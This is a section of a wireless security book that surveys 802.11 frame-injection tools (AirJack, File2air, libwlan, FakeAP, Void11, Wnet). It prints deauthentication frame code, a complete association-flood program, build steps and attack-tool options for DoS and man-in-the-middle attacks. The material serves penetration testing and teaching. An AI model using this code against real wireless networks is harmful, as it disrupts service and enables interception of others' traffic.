Wireless Frame-Generating Tools

Because 802.11 management and control frames are neither authenticated nor encrypted, being able to send custom 802.11 frames gives a wireless attacker an unlimited opportunity to cause Layer 2 DoS attacks on a targeted WLAN. Even worse, a skilled attacker can spoof his or her attacking machine as an access point, wireless bridge, or client host on the unfortunate infrastructure or managed network or as a peer on the independent or ad-hoc WLAN. Then a DoS attack can be used to deassociate WLAN hosts from a legitimate access point or bridge and force them to associate with the attacker's machine.

There are two main tools that allow custom 802.11 frame generation: AirJack suite (Linux) and the more recent Wnet dinject utilities collection (OpenBSD). To an extent, HostAP drivers for the Prism chipset cards can also be considered as 802.11 frame-generating tools, because access point functionality involves transmitting beacons and sending probe response frames. FakeAP from Black Alchemy, which is run on top of HostAP and uses Linux Wireless Extensions to generate custom beacons, underlines such functionality and can be employed in several 802.11 attacks as well as for its intended use as a wireless honeypot. Void11 is another frame-generating tool that uses HostAP and is designed for data link DoS attacks on 802.11 networks, including mass DoS attacks.

AirJack

The AirJack suite was originally made up of a custom driver for Prism II chipset cards and a few end-user utilities that use the airjack_cs module's custom 802.11 frame-generation capabilities to launch a variety of attacks against WLANs. An expected but delayed second release of AirJack should support wireless hardware with chipsets other than Prism. Here we describe the first versions of AirJack, extensively tested and tried at the moment of writing.

The attack utilities included with the two first versions of AirJack contain DoS by sending deauthentication frames, closed ESSID disclosure attack via forcing host reauthentication, and Layer 2 man-in-the-middle attack with an additional possibility of a specific man-in-the-middle attack against FreeSWAN-based Wavesec wireless IPSec implementation. Later versions of AirJack include only the closed ESSID disclosure attack utility. Nevertheless, the utilities from earlier versions, written to implement the attacks just mentioned, work fine with the later AirJack versions.

The main functionality of AirJack is based around its ability to send deauthenticate 802.11 frames. For those interested in how AirJack generates deauthenticate frames, here is an example of the frame-building code:


void send_deauth (__u8 *dst, __u8 *bssid)

{

struct {

 struct a3_80211   hdr;

 __u16    reason;

 }frame;

memset(&frame, 0, sizeof(frame));

frame.hdr.mh_type = FC_TYPE_MGT;

frame.hdr.mh_subtype = MGT_DEAUTH;

memcpy(&(frame.hdr.mh_mac1), dst, 6);

memcpy(&(frame.hdr.mh_mac2), bssid, 6);

memcpy(&(frame.hdr.mh_mac3), bssid, 6);

frame.reason = 1;

send(socket, &frame, sizeof(frame), 0);

}

Despite being developed for Prism II chipset cards, AirJack end-user utilities use Hermes chipset cards in man-in-the-middle attacks, providing the orinoco.c.patch included with the suite is applied. This patch was designed for pcmcia-cs services version 3.1.31 and you might want to see if it will work with later versions of the card services to use a Hermes chipset card with the AirJack man-in-the-middle utilities. Our experience in applying the patch to pcmcia-cs-3.2.1 wasn't successful, so you might be forced to downgrade to version 3.1.31 or rewrite the patch.

The code of AirJack is GNU and available for download at both http://802.11ninja.net/airjack/ and Sourceforge; several crippled copies of AirJack can be found on the Web and you'll need some C knowledge to fix them. To compile AirJack do make; if you are plagued by the 'cmpxchg' undefined symbol error message, change the AirJack Makefile CFLAGS line from


CFLAGS= -O2 -Wall -Werrow -DMODULE -D__KERNEL__$(INCLUDES)


CFLAGS= -O2 -Wall -DMODULE -D__KERNEL__ $(INCLUDES)

Then copy the airjack_cs.o module to your modules path (should be /lib/modules/<your_kernel_version>/pcmcia) and run depmod. After that use the linux-wlan-ng-generated /etc/pcmcia configuration files and replace all bind "prism2_cs" strings in wlan-ng.conf and config by bind "airjack_cs". Alternatively, you can use the ready configuration files supplied on the accompanying Web site. Unplug your wireless card and restart the card manager. Plug the card back in and do lsmod. You should see something like this in its output:


Module                  Size  Used by    Tainted: P

 airjack_cs             16712   0

Then do ifconfig -a and check if there is an aj0 interface:


arhontus:~# ifconfig -a

aj0  Link encap:UNSPEC  HWaddr 00-DE-AD-C0-DE-00-00-00-00-00-00-00-00-00-00-00

     UP BROADCAST RUNNING MULTICAST  MTU:1600  Metric:1

     RX packets:1754241 errors:17589 dropped:0 overruns:0 frame:17589

     TX packets:0 errors:19624 dropped:0 overruns:0 carrier:0

        collisions:0

     RX bytes:120758718 (115.1 MiB)  TX bytes:0 (0.0 b)

Please note that iwconfig will not show any data about the aj0 interface, because no wireless extensions are present within this device. Bring up the aj0 interface with ifconfig aj0 up. Go to the airjack-v0.6.2-alpha/tools directory and do make. Then do make monkey_jack. Congratulations, your AirJack should be ready for use.

If you want to employ a Hermes chipset card for man-in-the-middle attacks, first patch the pcmcia-cs sources:


arhontus:~#cp /airjack-v0.6.2-alpha/patches/orinoco.c.patch \

/usr/src/pcmcia-cs-3.1.31/wireless/

arhontus:~# patch -p0 < orinoco.c.patch

arhontus:~# ./Configure –force

Back up your existing PCMCIA modules and install the patched pcmcia-cs. Check that both Prism II and Hermes chipset cards can fit into your PCMCIA slots simultaneously (having both cards with MMCX connectors and without built-in dipole antennas is a good idea).

The end-user attack utilities for AirJack include the following:

essid_jack, which forces wireless hosts to reauthenticate with an AP on a closed network and sniffs the hidden ESSID in the process
wlan_jack, the deauthentication spoofed MAC address frames flooder
monkey_jack, the man-in-the-middle attack tool (which inserts the AirJack-running host between the access point and a target machine on a WLAN)
kraker_jack, a modified monkey_jack capable of inserting the attacking host between Wavesec client and server

Wavesec (http://www.wavesec.org) is a wireless-specific mobile implementation of the Linux FreeSWAN IPSec client. The peculiar thing about Wavesec operation is the way it arranges the trust required between the wireless client and the IPSec gateway. Wavesec does it by exchanging public keys during the DHCP address assignment. The client provides its forward hostname and public key in a DHCP request. The DHCP server then inserts both into the DNS server for the reverse zone (the IP to hostname mapping) using dynamic DNS update. Kraker_jack attacks these specific key exchange features of Wavesec to insert the attacking host between the Wavesec client and server on a second layer (monkey_jack), replace the client key by its own, and decrypt bypassing data. Thus, kraker_jack does not attack the FreeSWAN and IPSec protocol per se, and FreeSWAN IPSec settings based on the shared secret or x509 certificates we describe in Chapter 14 are not vulnerable to the kraker_jack attack.

Other utilities included among the AirJack tools are setmac and set_channel for the Hermes chipset card when used in man-in-the-middle attacks (self-explanatory) and dump_core, which allows you to monitor raw output from the aj0 interface (pipe it into a file and use strings to see the ESSIDs of present wireless networks, etc.).

File2air

File2air is a tool written by Joshua Wright to allow custom frame generation using the AirJack drivers. File2air reads binary output from a file and sends it to the air, as the tool's name suggests. This means that virtually any frame, including 802.1x frames, can be sent to the wireless network for whatever reason you might have to send it. It also means that you will have to possess a good knowledge of 802.11 (or other) protocols to write your custom frames in binary format to be fed to File2air and spend a sufficient time in front of your favorite hex editor (e.g., Gnome's Ghex). On the other hand, this gives you a good incentive to learn the protocol suite and enjoy complete freedom in what you send.

The first version (v0.1) of File2air, which came out just as the draft of this book entered the final stage, included three binary sample frames in the ./packets directory: deauthenticate, probe response, and eap-authentication-failure (deauth.bin, proberesp.bin, and eap-failure.bin, respectively). See the README file for examples of attacks using these sample binaries. Doubtless, the number of binary frame files submitted by users will grow like an avalanche and the functionality of the tool will dramatically expand. For the users' convenience, variable fields in the frames such as source and destination MACs and ESSIDs can be overwritten from the command line when File2air is run:


arhontus:~# ./file2air -h

file2air v0.1 - inject 802.11 packets from binary files <Joshua.Wright@jwu.edu>

Usage: file2air [options]



 -i --interface Interface to inject with

 -c --channel   Specify a channel (defaults to current)

 -m --mode      Specify an operating mode (defaults to current)

 -r --monitor   Specify RFMON mode (1=on, 0=off, defaults to current)

 -f --filename  Specify a binary file contents for injection

 -n --count     Number of packets to send

 -w --delay     Delay between packets (uX for usec or X for seconds)

 -d --dest      Override the destination address

 -s --source    Override the source address

 -b --bssid     Override the BSSID address

 -h --help      Output this help information and exit

 -v -verbose    Print verbose info (more -v's for more verbosity)

As you can see, both the number of sent frames and the interval between the frames can be set. More interestingly, you can send frames in any operating mode including RFMON. Thus, you can sniff the WLAN and respond to specific events by sending back custom frames. For example, when a Netstumbler probe request is detected, you can send fake probe responses back to confuse those probing Windows monkeys in the neighborhood.

Libwlan

If, instead of writing your customized frames in a hex editor, you prefer writing them in C, libwlan by Joachim Keinert, Charles Duntze, and Lionel Litty is a tool for you. It is a fine 802.11 frame-creation library working with Linux HostAP drivers. It includes socket initialization, frame-building code and headers supporting creation of data, RTS/CTS, authentication and association requests, probe requests, and deauthentication and deassociation frames. The detailed structure of 802.11 data, control and management frames, frame specifics, status and reason codes, and authentication "algorithms" (open or shared) are nicely outlined in the lib_total.h libwlan header, which is worth reading, even if only for educational purposes.

A sample progtest.c tool using libwlan to send a flood of association requests is included. We have decided to present it here as an example of how easy it is to create 802.11 frames using libwlan:



/****************************************************

                          progtest.c  -  description

                             -------------------

begin      : 01/04/2003

copyright : (C) 2003 by Joachim Keinert, Charles Duntze, Lionel Litty

****************************************************/



/****************************************************

 *

 *   This program is free software; you can redistribute it and/or modify

 *   it under the terms of the GNU General Public License as published by

 *   the Free Software Foundation

 *

****************************************************/



/* This is an example of how to use Libwlan to develop

   a small program that tests an Access Point.

   This program tries to associate a great number of

   fake stations to an Access Point to see how it

   behaves.

*/



#include <libwlan.h>



int main(int argc, char *argv[])

{

  int s,*len,i,j ;

  const char *iface = NULL;

  struct ieee80211_mgmt mgmt;

  char *bssid_addr, *dst_addr, *src_addr;

  u_char *bssid,*dst_mac,*src_mac;





  if (argc != 5)

    {

      printf("Usage: %s <wlan#ap> <bssid_address> <dst_address> <src_address>\n",argv[0]);

      printf("Example: %s wlan0ap 00:01:23:45:0A 00:01:23:45:0A          00:02:4C:00:00\n"

,argv[0]);

      exit(-1);

    }

  else

    {

      iface = argv[1];

      bssid_addr = argv[2];

      dst_addr = argv[3];

      src_addr = argv[4];

    }



  s=socket_init(iface);



  len = malloc (sizeof(int));



  bssid = lib_hex_aton(bssid_addr,len);

  dst_mac = lib_hex_aton(dst_addr,len);

  src_mac = lib_hex_aton(src_addr,len);





    for(j=1;j<244;j++){

    for(i=1;i<244;i++){



      src_mac[4] = i;

      src_mac[5] = j;

      mgmt = build_auth(bssid,src_mac,bssid);

      if (send(s, &mgmt,IEEE80211_HDRLEN + sizeof(mgmt.u.auth),0) < 0)

        {

          perror("send");

          sleep (1); //wait for a while, buffer is possibly full

        }

      mgmt = build_assoc_req(bssid,src_mac,bssid);

      if (send(s, &mgmt,IEEE80211_HDRLEN + sizeof(mgmt.u.assoc_req),0) < 0)

        perror("send");

      usleep (100);

    }

    printf("Progression status: %.1f%% \n",j/244.0*100);

  }

close(s);

  return 0;

Just by changing a few variables in this example you would be able to send floods of other 802.11 frames outlined in the libwlan frame construction code and headers. Happy pounding!

FakeAP

FakeAP is a Perl tool that uses the features of HostAP drivers and the iwconfig command to emit beacon frames with random or custom ESSIDs, BSSIDs (access point MACs), and channel assignments. It was originally designed as a wireless honeypot tool but can be maliciously used to do the following:

Flood a channel with a stream of beacon frames causing a DoS attack
Increase the channel noise in the course of a man-in-the-middle attack
Drive a rogue access point detection system insane and fill its log space to full capacity

Whereas FakeAP for Linux is well known, few are aware that BSD FakeAP also exists and can be downloaded from http://bsdvault.net/bsdfap.txt. The functionality of both original and BSD FakeAP is very similar and few differences are underlined in the BSD FakeAP code. You might want to tweak some variables in the FakeAP Perl script before running it:


use vars

  qw( $sleep_opt $channel_opt $mac_opt $essid_opt $words_opt

  $interface_opt $vendors_opt $wep_opt $key_opt $power_opt );



my $MAX_CHANNEL = 11; # North America. Change for other regions.

my $IWCONFIG    = "/sbin/iwconfig";          # Change as needed

my $IFCONFIG    = "/sbin/ifconfig";          # Change as needed

my $CRYPTCONF   = "/usr/local/bin/hostap_crypt_conf";   # Change as needed

my @words = ( "Access Point", "tsunami", "host", "airport", "linksys" );

my @vendors = ( "00:00:0C:", "00:00:CE:", "00:00:EF:" );

You might also want to play with word and MAC files included in the fakeap/lists directory.

Running FakeAP is easy:


arhontus:~# perl fakeap.pl

fakeap 0.3.1 - Wardriving countermeasures

Copyright (c) 2002 Black Alchemy Enterprises. All rights reserved

Usage: fakeap.pl --interface wlanX [--channel X] [--mac XX:XX...]

[--essid NAME] [--words FILENAME] [--sleep N] [--vendors FILENAME]

[--wep N] [--key KEY] [--power N]

     --channel X     Use static channel X

     --essid NAME    Use static ESSID NAME

     --mac XX:XX...  Use static MAC address XX:...

     --words FILE    Use FILE to create ESSIDs

     --sleep N       Sleep N Ssec between changes, default 0.25

     --vendor FILE   Use FILE to define vendor MAC prefixes

     --wep N      Use WEP with probability N where 0 < N <= 1

     --key KEY    Use KEY as the WEP key. Passed raw to iwconfig

     --power N    Vary Tx power between 1 and N. In milliwatts

An interesting option to consider is generating fake WEP-enabled access points. Also, keep in mind that the interchangeable power transmission level might not be supported by your 802.11 Prism chipset card (remember, you need a Prism chipset device to use FakeAP) and is not implemented by the BSD FakeAP at the moment.

Void11

Void11 is another 802.11 frame-generating tool working under Jouni Malinen's Linux HostAP drivers (do not forget to define PRISM2_HOSTAPD in driver/modules/hostap_config.h when compiling HostAP for void11 to work). It was designed for data link layer DoS resilience testing and possible active defense setup. Void11 can generate three types of 802.11 frames, namely deauthenticate, authenticate, and associate. The floods of authentication and association requests can crash or freeze some access points by filling up the buffer space assigned for handling and processing these requests. Two utilities included within void11 are void11_hopper and void11_penetration. The void11_hopper sets the wireless card under HostAP to hop through the 14 DSSS 802.11 channels, and void11_penetration is the actual frame-generating tool:


arhontus# void11_penetration -h

/* void11 - 802.11b penetration testing utility

 *          version 20030829, send comments to reyk@vantronix.net

 *

 * general options:

 * -t val    type (default: 1)

 *                 0: no action

 *                 1: deauth stations

 *                 2: auth flood

 *                 3: assoc flood

 * -d n      delay (default: 10000 usecs)

 * -s MAC    station (default: ff:ff:ff:ff:ff:ff / random)

 * -S str    ssid (default: ' ')

 * -h        show this help

 * -D        debug (-DD... for more debug)

 *

 * single target dos:

 * -B MAC    bssid (default: scan for bssids)

 *

 * auto target dos:

 * -m n      max concurrent floods (default: 23 floods)

 * -T n      timeout (default: 10 secs)

 * -l file   matchlist

 * -p n      match policy (white: 0, black: 1, default: 0)

 */

As you can see from the output, void11 is rich in options and can perform the following:

Scanning for the networks to attack
Attacking the network with a selected ESSID
Attacking single or multiple hosts
Running up to 23 flood threads simultaneously
Selecting hosts to attack from a matchlist of MAC addresses
Adjusting the delay between sent frames

You'll need to place a card into the Master (access point) mode before launching a deauthentication attack against a single wireless host.

Wnet

Wnet is an advanced packet creation and injection framework for building and injecting raw 802.11 frames under OpenBSD 3.2. Other OpenBSD versions and BSD flavors are likely to be supported in the future. Wnet consists of the libwnet library, the reinj ARP/TCP ACK injector we have already reviewed, and dinject.

To install dinject, first place your kernel source to /usr/src/sys, patch it with the wi.diff patch that comes with Wnet (cd wnet && sudo patch -d /usr/src -p1 < wi.diff) and recompile:


arhontus:~# cd /usr/src/sys/i386/compile/MYKERNEL

arhontus:~# make

arhontus:~# cd /usr/src/sys/dev/ic

arhontus:~# cp if_wi*.h /usr/include/dev/ic

arhontus:~# reboot

Then you'll need to compile libwnet:


arhontus:~# cd wnet/libwnet

arhontus:~# make

arhontus:~# make install

and only then dinject:


arhontus:~# cd ../dinject

arhontus:~# make

arhontus:~# make install

Dinject is a Nemesis-like multifunctional 802.11 frame-building tool. Just like Nemesis, dinject consists of multiple "one frame type—one utility" tools. Set up your card into the HostAP mode (sudo wicontrol wi0 -p 5) and enjoy being able to send practically any type of custom-built 802.11 control or management frame, including the following:

Association request frames
Association response frames
ATIM frames
Authentication request frames
Beacons
Custom data
Deauthentication request frames
Deassociation request frames
Probe requests
Probe responses
Reassociation requests
Reassociation responses

Although dinject does not include any canned AirJack-style attack utilities, it is an immensely powerful tool in the hands of an attacker familiar with the 802.11 protocol stack and operations. Using dinject together with a 802.11 sniffer is also a great way to learn how 802.11 protocols work.

< Day Day Up >